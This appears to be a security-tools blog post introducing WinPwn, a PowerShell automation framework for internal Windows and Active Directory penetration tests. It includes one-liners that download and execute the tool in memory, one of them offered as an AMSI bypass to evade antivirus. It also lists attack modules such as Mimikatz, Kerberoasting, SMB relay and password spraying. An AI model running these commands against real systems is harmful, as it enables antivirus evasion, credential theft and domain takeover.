WinPwn is a automation for internal Windows Penetrationtest / AD-Security. In many past internal penetration tests I often had problems with the existing Powershell Recon / Exploitation scripts due to missing proxy support.
I often ran the same scripts one after the other to get information about the current system and/or the domain. To automate as many internal penetrationtest processes (reconnaissance as well as exploitation) and for the proxy reason
I wrote my own script with automatic proxy recognition and integration. The script is mostly based on well-known large other offensive security Powershell projects. They are loaded into RAM via IEX Downloadstring.
Any suggestions, feedback, Pull requests and comments are welcome!
Just Import the Modules with: Import-Module .\WinPwn.ps1
or iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1')
For AMSI Bypass use the following oneliner: iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/ObfusWinPwn.ps1')
If you find yourself stuck on a windows system with no internet access – no problem at all, just use Offline_Winpwn.ps1, all scripts and executables are included.
Also Read – Jaeles : The Swiss Army Knife For Automated Web Application Testing
Functions available after Import:
WinPwn
-> Menu to choose attacks:Inveigh
-> Executes Inveigh in a new Console window , SMB-Relay attacks with Session management (Invoke-TheHash) integratedsessionGopher
-> Executes Sessiongopher Asking you for parameterskittielocal
->localreconmodules
->domainreconmodules
->Privescmodules
-> Executes different privesc scripts in memory (PowerUp Allchecks, Sherlock, GPPPasswords)latmov
-> Searches for Systems with Admin-Access in the domain for lateral movement. Mass-Mimikatz can be used after for the found systemsshareenumeration
-> Invoke-Filefinder and Invoke-Sharefinder (Powerview / Powersploit)groupsearch
-> Get-DomainGPOUserLocalGroupMapping – find Systems where you have Admin-access or RDP access to via Group Policy Mapping (Powerview / Powersploit)Kerberoasting
-> Executes Invoke-Kerberoast in a new window and stores the hashes for later crackingpowerSQL
-> SQL Server discovery, Check access with current user, Audit for default credentials + UNCPath Injection AttacksSharphound
-> Downloads Sharphound and collects Information for the Bloodhound DBadidnswildcard
-> Create a Active Directory-Integrated DNS Wildcard RecordMS17-10
-> Scan active windows Servers in the domain or all systems for MS17-10 (Eternalblue) vulnerabilitySharpcradle
-> Load C# Files from a remote Webserver to RAMDomainPassSpray
-> DomainPasswordSpray Attacks, one password for all domain usersDisclaimer
Usage of WinPwn for attacking targets without prior mutual consent is illegal. It’s the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. Only use for educational purposes.
ROADTools is a powerful framework designed for exploring and interacting with Microsoft Azure Active Directory…
Microsoft 365 Groups (also known as M365 Groups or Unified Groups) are at the heart…
SeamlessPass is a specialized tool designed to leverage on-premises Active Directory Kerberos tickets to obtain…
PPLBlade is a powerful Protected Process Dumper designed to capture memory from target processes, hide…
HikPwn: Comprehensive Guide to Scanning Hikvision Devices for Vulnerabilities If you’re searching for an efficient…
What Are Bash Comments? Comments in Bash scripts, are notes in your code that the…